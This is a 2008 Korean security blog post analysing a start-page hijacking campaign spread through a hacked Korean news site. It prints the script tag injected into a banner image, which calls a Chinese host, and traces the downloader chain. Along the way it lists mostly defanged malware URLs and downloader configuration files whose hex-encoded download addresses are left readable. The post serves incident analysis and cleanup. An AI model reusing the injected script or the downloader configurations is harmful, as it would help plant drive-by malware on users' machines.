인터넷과 보안 :: 중국 시작페이지 악성코드 유포 분석

신종악성코드정보2008/11/21 18:28

중국 시작페이지 악성코드 유포 분석

2008년 11월 19일경부터 감염 보고가 증가하기 시작한 중국 웹 사이트 시작페이지 증상은 국내 특정 뉴스 등의 사이트가 해킹되어 보안취약점을 이용하여 유포되기 시작한 것으로 보여지고 있다.

대표적으로 MS06-014 Exploit, Flash Exploit, MS08-041 Exploit 등 많은 취약점이 사용되고 있다.

[www.3929.cn 중국 사이트 시작페이지 증상 수동으로 해결하기]
http://viruslab.tistory.com/371

이 증상은 이미 중국 등지에서는 예전부터 보고가 있는 형태의 악성코드이지만 최근에 국내에 유포되는 게임 계정 트로이목마와 함께 Multi Downloader 기능으로 함께 감염되면서 피해가 속출하고 있는 상황이다.

잉카인터넷 전용백신으로 먼저 검사를 해보시고, 그래도 조치가 안되시면 아래 수동조치를 따라해 보세요.

http://www.nprotect.com/v6/data/index.php?mode=vs_down_view&no=261&page=1&key=&keyfield=

http://pds.nprotect.co.kr/pds/scan/TYStartPage.com

실제 유포가 이루어지고 있는 국내 웹 사이트는 다음과 같이 악용되고 있다.

[유포 추적 분석]

hxxp://www.dai(위협요소생략).com
hxxp://www.dai(위협요소생략).com/section/article_view.aspx?at_id=93243
hxxp://www.dai(위협요소생략).com:8066/bannerSWF/banner.jpg

공격자는 banner.jpg 파일을 변조하여 내부에 다음과 같은 스크립트를 삽입하였다.
<script src=hxxp://www.8(위협요소생략).cn/get.php></script>

hxxp://www.8(위협요소생략).cn/count.php?Ado=

hxxp://www.7(위협요소생략).cn/mm/ado.css

스크립트가 작동하게 되면 중국의 특정 사이트로 접속을 시도하여 ado.css 라는 파일을
C:\CONFIG.SYS 라는 파일로 생성한 후 삭제한다.

CONFIG.SYS 파일은 다시 C:\Program Files\Internet Explorer\SIGNUP\conime.exe 로 등록하고
실행한다.

그 후에 다음과 같은 사이트로 추가 접속하여 악성코드 다운로드가 진행된다.

hxxp://www.7(위협요소생략).cn/other/ver.txt : 2008-11-19
hxxp://www.7(위협요소생략).cn/other/krdown.txt

krdown.txt 파일에 의해서 다음과 같은 9개의 rar 파일이 다운로드된다.

hxxp://www.9(위협요소생략).cn/cj/35kr.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/ie.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/kr.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/pop.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/dousee.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/yoyo.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/xiao18.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/ddos.rar -> EXE 파일
hxxp://www.9(위협요소생략).cn/cj/hgz.rar -> EXE 파일

hxxp://aa.9(위협요소생략)et:82/1218.txt -> hxxp://218(위협요소생략)43:81/kfn.htm -> EXE 파일

hxxp://aa.9(위협요소생략)et/ProcessID.txt -> hxxpdownload.exe|hxxpDownLoad.exe|x1.exe|xm.exe

hxxp://update.(위협요소생략).cn/newup4.txt
[PlugList]
Url=666E0199EB5F932286F65FECCBB07159F396FD17D74A4EC5FF47F4749B5B377D
[Download]
Ver=32
URL=666E0199EB5F932286F65FECCBB07159FA8EADAE5D0FA85C6F68B40D66DCA01C43BF2947A61065E30B3959E44BBA7FE5

hxxp://update.(위협요소생략).cn/pup4.xml
666E0199EB5F932286F65FECCBB071590C00D1B70292FE7F458E4451C6175A500B13FE0DD7977D36FF53B306DFD0E702458E4451C6175A50FBC0B33507AF31DF9B044F3ED965D7FB
666E0199EB5F932286F65FECCBB071599F81DC787508952E80D06A4FD662F1800676A729A53FE452A4289F4CC16C260A3EFF96F7D4FFBFA8E3D542EFA07EC0D2
666E0199EB5F932286F65FECCBB071594A5A3253D162D899269CAC4AD435BC172C1ADEFED57D67F7685E7207F6A3374E7A935DC8ACE44EDB

hxxp://update.(위협요소생략).cn/xunleiBHO11.dll

hxxp://update.(위협요소생략).cn/MSWMPlayer.exe

hxxp://soft.(위협요소생략).cn/newup3.txt
[PlugList]
Url=7C11C7B058062F0F144071AB1FBF88A7B549E3D43CC9A1D7715DF83325CF1AAB
[Download]
Ver=8
URL=7C11C7B058062F0F144071AB1FBF88A7B49AB28ED450C34F2EC9E013138881D9BE484266E81C4755A3117C0300DD5877

hxxp://update.(위협요소생략).cn/033.exe

hxxp://888.(위협요소생략).cn/pw.ini
[main]
u=hxxp://219.(위협요소생략)odule/zzz.exe
c=/S

hxxp://update.(위협요소생략).net/20081119/26.dll

hxxp://219.(위협요소생략)odule/miniDll.dll

hxxp://219.(위협요소생략)odule/p1.dll

hxxp://219.(위협요소생략)odule/p2.dll

hxxp://219.(위협요소생략)odule/p3.dll

hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/fx.htm
hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/ss.htm (X)
hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/sina.htm (X)
hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/UU.htm (X)
hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/Thunder.html (X)
hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/real.htm
hxxp://www.loy(위협요소생략).cn/a02/fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/Real.html

fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/fx.htm -> hxxp://www.loy(위협요소생략).cn/a02/ilink.html
fxx.htm -> hxxp://www.loy(위협요소생략).cn/a02/fx.htm -> hxxp://www.loy(위협요소생략).cn/a02/flink.html

ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/i115.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/i45.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/i16.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/i28.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/i47.swf

ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/f115.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/f64.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/f47.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/f45.swf
ilink.html -> hxxp://www.loy(위협요소생략).cn/a02/f16.swf

hxxp://2008.(위협요소생략).com/2008//update.txt
[update] ver=2008111919 url=687474703A2F2F36302E3139312E3132392E3135302F454E69656E673736353867656E6B672E657865 [startpage] startpage=1 url=687474703A2F2F636C6173732E6361697969382E636F6D2F312E617370 [adsclick] adsclick=1 [popwin] popwin=1 url1=687474703A2F2F7777772E73686F75736F2E636F6D2F313131312F322E68746D6C nohide1=1 sleeptime1=1200 jiangetime1=0 cishu1=1 url2=687474703A2F2F7777772E6361697969382E636F6D nohide2=1 sleeptime2=600 jiangetime2=0 cishu2=1 url3=687474703A2F2F7777772E73686F75736F2E636F6D2F313131312F332E68746D6C nohide3=1 sleeptime3=900 jiangetime3=0 cishu3=1 count=3 [nosafe] nosafe=1 [count] count=1 mecount=1 url=687474703A2F2F323030382E333636656E742E636F6D2F323030382F636F756E742F636F756E742E617370

hxxp://219.(위협요소생략).150/1.html
hxxp://219.(위협요소생략).150/2.html
hxxp://219.(위협요소생략).150/3.html
hxxp://219.(위협요소생략).150/4.html
hxxp://219.(위협요소생략).150/5.html
hxxp://219.(위협요소생략).150/6.html
hxxp://219.(위협요소생략).150/7.html
hxxp://219.(위협요소생략).150/11.html
hxxp://219.(위협요소생략).150/12.html
hxxp://219.(위협요소생략).150/13.html
hxxp://219.(위협요소생략).150/14.html
hxxp://219.(위협요소생략).150/15.html
hxxp://219.(위협요소생략).150/16.html
hxxp://219.(위협요소생략).150/30.html
hxxp://219.(위협요소생략).150/31.html
hxxp://219.(위협요소생략).150/32.html
hxxp://219.(위협요소생략).150/37.html
hxxp://219.(위협요소생략).150/38.html
hxxp://219.(위협요소생략).150/39.html
hxxp://219.(위협요소생략).150/40.html
hxxp://219.(위협요소생략).150/41.html
hxxp://219.(위협요소생략).150/42.html
hxxp://219.(위협요소생략).150/43.html
hxxp://219.(위협요소생략).150/44.html
hxxp://219.(위협요소생략).150/47.html
hxxp://219.(위협요소생략).150/17.html
hxxp://219.(위협요소생략).150/49.html
hxxp://219.(위협요소생략).150/50.html
hxxp://219.(위협요소생략).150/51.html
hxxp://219.(위협요소생략).150/52.html
hxxp://219.(위협요소생략).150/53.html
hxxp://219.(위협요소생략).150/54.html
hxxp://219.(위협요소생략).150/55.html
hxxp://219.(위협요소생략).150/56.html
hxxp://219.(위협요소생략).150/57.html

hxxp://www.loy(위협요소생략).cn/a02/Ms06014.htm -> hxxp://down.i(위협요소생략).cn/new/a02.css

hxxp://2008.(위협요소생략).com/2008//user/setup1541.txt
[file] file1=687474703A2F2F36302E3139312E3132392E3135302F74657374312E657865 filename1=test1.exe fexec1=1 ftype1=test1 ftime1=0 fcrc1=test1 file2=687474703A2F2F36302E3139312E3132392E3135302F74657374322E657865 filename2=test2.exe fexec2=1 ftype2=test2 ftime2=0 fcrc2=test2 file3=687474703A2F2F36302E3139312E3132392E3135302F74657374342E657865 filename3=test4.exe fexec3=1 ftype3=test4 ftime3=0 fcrc3=test4 file4=687474703A2F2F36302E3139312E3132392E3135302F74657374352E657865 filename4=test5.exe fexec4=1 ftype4=test5 ftime4=0 fcrc4=test5 file5=687474703A2F2F36302E3139312E3132392E3135302F746573743331322E657865 filename5=test312.exe fexec5=1 ftype5=test3 ftime5=0 fcrc5=test3 file6=687474703A2F2F36302E3139312E3132392E3135302F74657374392E657865 filename6=test9.exe fexec6=1 ftype6=test9 ftime6=19 fcrc6=test9 count=6 file=1

hxxp://60.(위협요소생략).150/test1.exe
hxxp://60.(위협요소생략).150/test2.exe
hxxp://60.(위협요소생략).150/test4.exe
hxxp://60.(위협요소생략).150/test5.exe (X)
hxxp://60.(위협요소생략).150/test312.exe (X)

hxxp://k1.(위협요소생략).cn/down6/ad/?s=C1ADB8E3AF9EBBB7B4AEDBB382B5CAF4&t=2008-11-21%20
hxxp://210(위협요소생략).5/c/n1/index.html
<html>
<head>
<title>update</title>
<input name="FileLen" type="text" value="97792">
<link href="vvt.css" rel="stylesheet" type="text/css">
<link href="wyf.css" rel="stylesheet" type="text/css">
</head>
<body>
</body>
</html>

hxxp://210(위협요소생략).5/c/n1/vvt.css
hxxp://210(위협요소생략).5/c/n1/wyf.css

hxxp://www.i(위협요소생략).cn/bak.txt
[file]
open=y
url1=hxxp://59.(위협요소생략).165/new/no1.exe
url2=hxxp://59.(위협요소생략).165/new/no2.exe
url3=hxxp://59.(위협요소생략).165/new/no3.exe
url4=hxxp://59.(위협요소생략).165/new/no4.exe
url5=hxxp://59.(위협요소생략).165/new/no5.exe
url6=hxxp://59.(위협요소생략).165/new/no6.exe
url7=hxxp://59.(위협요소생략).165/new/no7.exe
url8=hxxp://59.(위협요소생략).165/new/no8.exe
url9=hxxp://59.(위협요소생략).165/new/no9.exe
url10=hxxp://59.(위협요소생략).165/new/no10.exe
url11=hxxp://59.(위협요소생략).165/new/no11.exe
url12=hxxp://59.(위협요소생략).165/new/no12.exe
url13=hxxp://59.(위협요소생략).165/new/no13.exe
url14=hxxp://59.(위협요소생략).165/new/no14.exe
url15=hxxp://59.(위협요소생략).165/new/no15.exe
url16=hxxp://59.(위협요소생략).165/new/no16.exe
url17=hxxp://59.(위협요소생략).165/new/no17.exe
url18=hxxp://59.(위협요소생략).165/new/no18.exe
url19=hxxp://59.(위협요소생략).165/new/no19.exe
url20=hxxp://59.(위협요소생략).165/new/no20.exe
url21=hxxp://59.(위협요소생략).165/new/no21.exe
url22=hxxp://59.(위협요소생략).165/new/no22.exe
url23=hxxp://59.(위협요소생략).165/new/no23.exe
url24=hxxp://59.(위협요소생략).165/new/no24.exe
url25=hxxp://59.(위협요소생략).165/new/no25.exe
url26=hxxp://59.(위협요소생략).165/new/no26.exe
url27=hxxp://59.(위협요소생략).165/new/no27.exe
url28=hxxp://59.(위협요소생략).165/new/no28.exe
url29=hxxp://59.(위협요소생략).165/new/no29.exe
url30=hxxp://59.(위협요소생략).165/new/no30.exe
count=30

hxxp://210(위협요소생략).5/c/x3/index.html
<html>
<head>
<title>update</title>
<input name="FileLen" type="text" value="96256">
<link href="vvt.css" rel="stylesheet" type="text/css">
<link href="wyf.css" rel="stylesheet" type="text/css">
</head>
<body>
</body>
</html>

hxxp://210(위협요소생략).5/c/x3/vvt.css - vvt-2.css
hxxp://210(위협요소생략).5/c/x3/wyf.css - wyf-2.css

hxxp://210(위협요소생략).5/c/x1/index.html
<html>
<head>
<title>update</title>
<input name="FileLen" type="text" value="96768">
<link href="vvt.css" rel="stylesheet" type="text/css">
<link href="wyf.css" rel="stylesheet" type="text/css">
</head>
<body>
</body>
</html>

hxxp://210(위협요소생략).5/c/x1/vvt.css vvt-3.css
hxxp://210(위협요소생략).5/c/x1/wyf.css wyf-3.css

hxxp://210(위협요소생략).5/c/v14/index.html
<html>
<head>
<title>update</title>
<input name="FileLen" type="text" value="96256">
<link href="vvt.css" rel="stylesheet" type="text/css">
<link href="wyf.css" rel="stylesheet" type="text/css">
</head>
<body>
</body>
</html>

hxxp://210(위협요소생략).5/c/v14/vvt.css vvt-4.css
hxxp://210(위협요소생략).5/c/v14/wyf.css wyf-4.css

hxxp://219.(위협요소생략).15/zt/5.htm (X)
hxxp://219.(위협요소생략).15/zt/1.htm (X)
hxxp://219.(위협요소생략).15/zt/2.htm (X)
hxxp://219.(위협요소생략).15/zt/3.htm (X)
hxxp://219.(위협요소생략).15/zt/4.htm (X)
hxxp://219.(위협요소생략).15/zt/12.htm (X)

Posted by viruslab

Trackback 0 Comment 0

«이전 1 ... 2110 2111 2112 2113 2114 2115 2116 2117 2118 ... 2473 다음»

태터데스크 관리자

태터데스크 메시지

태터데스크 관리자

태터데스크 메시지

티스토리 툴바

인터넷과 보안

중국 시작페이지 악성코드 유포 분석

TRACKBACK http://viruslab.tistory.com/trackback/376

카테고리

공지사항

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

링크